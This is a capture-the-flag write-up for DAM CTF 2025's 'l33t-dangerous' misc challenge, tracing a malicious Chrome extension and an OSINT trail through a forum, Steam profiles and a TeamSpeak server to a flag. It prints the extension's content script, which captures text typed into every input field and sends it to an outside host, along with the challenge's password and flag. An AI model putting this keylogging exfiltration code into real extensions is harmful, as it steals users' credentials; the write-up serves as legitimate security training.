DAM CTF 2025 - MISC

Posted May 12, 2025

By 2Fa0n

6 min read

DAM CTF 2025 - MISC

Misc

l33t-dangerous

Solvers: 48
Author: WholeWheatBagels, Alex

Description

I was digging through my dad’s old CDs and found this. He used to work IT for the school district. Apparently, a middle schooler installed it on a teacher’s PC and somehow got into the grading system with it. No idea how it worked, but maybe you can figure it out.

Solution

They gave us a boom.crx file. No ideas what it is, so I just googled it. Turns out it’s a chrome extension.

We need to extract the contents of the file. Searching and found this extension CRX Extractor/Downloader. After converting to zip file, we unzip it out:

➜  l33t-dangerous unzip boom_extract.zip 
Archive:  boom_extract.zip
  inflating: content-script.js       
  inflating: manifest.json

Checking the content-script.js file, we found a base64 encoded string:

  
let boom = new Audio("data:audio/wav;base64,UklGRiKXBABXQVZFZm10IBAAAAABAAIARKwAABCxAgAEABAAZGF0YeCWBAASARMBQgFAASEBIwE+AT0BagFpAaoBrAG1AbQB9gH3AUICQQJvAm8CogKiAkwDTgMUBBIEjgSPBMUExAS5BLkEbARuBC0ELAS0A7ID0QLVAlgCUQJHAk8CqQGjAT4AQgCn/qT+qPyp/Cf6Jvp093b3xfTE9BbyFfKq76zvRu1E7djq2uqM6IroduZ35krlSeW35bnl5ubk5uHn4ec/6UDpdet06w7uD+7V8NTwwfPC86z2q/bd+d75h/2F/YoBjQHGBcMFwgnECRANDw1aEFsQABT...
+/wAAAQABAP7//v8BAAEAAAD///////8AAAIA/v/8/wMAAwD7//3/BABMSVNUBAAAAElORk9pZDMgCgAAAElEMwMAAAAAAAA=");

window.fetch = async (...args) => {
    // this stupid extension is useless why wont it work anymore?????
    // TODO: find out who invented CORS

    // whatever let's just simulate it for now
    await new Promise(resolve => setTimeout(resolve, 2000));
    return {
        ok: false,
        status: 418,
        statusText: "I'm a teapot",
        json: async () => ({ success: true }),
        text: async () => "it worked great",
    };
};

const targetNode = document.documentElement

const config = {attributes: true, childList: true, subtree: true};

const callback = (mutationList, observer) => {
    for (const mutation of mutationList) {
        if (mutation.type === "childList" && mutation.addedNodes.length > 0) {
            mutation.addedNodes.forEach(node => {
                if (node.nodeName === "INPUT") {
                    node.addEventListener("input", (e) => {
                        boom.currentTime = 0;
                        boom.play();

                        fetch("https://mwaas.el1t3.fun/payload", {
                            method: "POST",
                            headers: {
                                "Content-Type": "application/json",
                            },
                            body: JSON.stringify({
                                value: e.target.value,
                                url: window.location.href,
                                ele: e.target.name,
                                user: "NAVI"
                            }),
                        });
                    });
                }
            });
        }
    }
};

// Create an observer instance linked to the callback function
const observer = new MutationObserver(callback);

// Start observing the target node for configured mutations
observer.observe(targetNode, config);

Because the content of the file is huge but when I paste the data:audio/wav;base64, part into in the web browser, it gives me a WnZAQWgc.wav file.

It’s sounds like a boom sound. Nevermind, let’s look some code after the base64 part.
We found this url https://mwaas.el1t3.fun/payload in the code.

Let’s try to send a request to the url.

  
➜  l33t-dangerous curl -X POST https://mwaas.el1t3.fun/payload -H "Content-Type: application/json" -d '{"value":"test","url":"test","ele":"test","user":"NAVI"}'
Upload functionality has been disabled after the disappearance of CacheTheStamp3de%

CacheTheStamp3de, hmm maybe some hint later. Kinda curious if we remove the /payload part, what will happen.

So I click Login button, and it shows me this:

I does not have account yet so I click Sign Up button and it redirects me to this page https://el1t3.fun/ucp.php?mode=register.

But in order to register, we need to get the key answer for the confirmation of registration question.

Let’s check if we can join some forum without credentials.

Interesting, we found 2 forums: CS 1.6 Server and Off Topic.
Checking CS 1.6 Server forum, we found this 3 topics but we curious about this one help with CS1.6 config by CacheTheStamp3de.
Found a link sv_downloadurl "http://44.237.105.82/cstrike".

After going through the link, we found this image:

Gathering some information:

teamspeak ip: 54.68.66.115
teamspeak password: ask an admin

Check back the forum, we found some other users also:

CacheTheStamp3de is administrator

NAVI

LOIC

pootis

[myg0t] konata

Hmm, if we familiar with CS2 nowsdays, the OG version is Counter-Strike: 1.6.

Let’s continue checking some topics in the forum to see if we can find any useful information.
When go to this topic https://el1t3.fun/viewtopic.php?t=8 by CacheTheStamp3de, we found a Youtube video The Website is Down #1: Sales Guy vs. Web Dude.

I thought video from 16 years ago gonna leak somethings so I watched without skipping :D and guess what, its quality is only 480p which is so blur and noise pixels so watching 10:23 for nothing =)))

Continue checking the forum, we found in topic legit proof by NAVI from Off Topic forum had a video to proof legit in gaming.

OMG! Look at that OG window XP style. So nostalgic.
After go through the video, we found two Steam ID from NAVI and pootis.

NAVI: STEAM_0:0:936738840
pootis: STEAM_0:0:937385953

I usee this Steam ID Finder to find the profile of NAVI and pootis.

Go through these profiles:

First one is NAVI

We saw a fun comment from CacheTheStamp3de =))).

Second one is pootis

And we found another steam account from Friends list which is [myg0t] konata.

Here is the profile of [myg0t] konata

Found out that is account is in Skid Force Zero group.

Check them out Skid Force Zero, we found a conversation between members that we have mentions earlier.

Look back and we notice that the password for teamspeak is ask an admin. And the administrator for this group is CacheTheStamp3de. Let’s go through the conversation to see if admin type out the password.

There we go, the password is doorstuck22.

Then we need to install TeamSpeak to join the server.
After download and install, we go to the Connections menu and click Connect, add the server ip 54.68.66.115 and password doorstuck22.

We found the key answer for the register confirmation question.

Then we are able to register and login. We found another forum Hacking covers 2 topics.

We go through 2 topics and found a flag in steal creds from noobs! [free] topic by LOIC.

And we only found SSH private key in this topic.

This is useful for our web/l33t-benign challenge because from this challenge description, they said that (You probably should solve l33t-dangerous first.).

Flag: dam{we_wer3_the_skids_all_al0ng}

CTF Writeups

ctf misc

This post is licensed under CC BY 4.0 by the author.

Misc

l33t-dangerous

Description

Solution

Trending Tags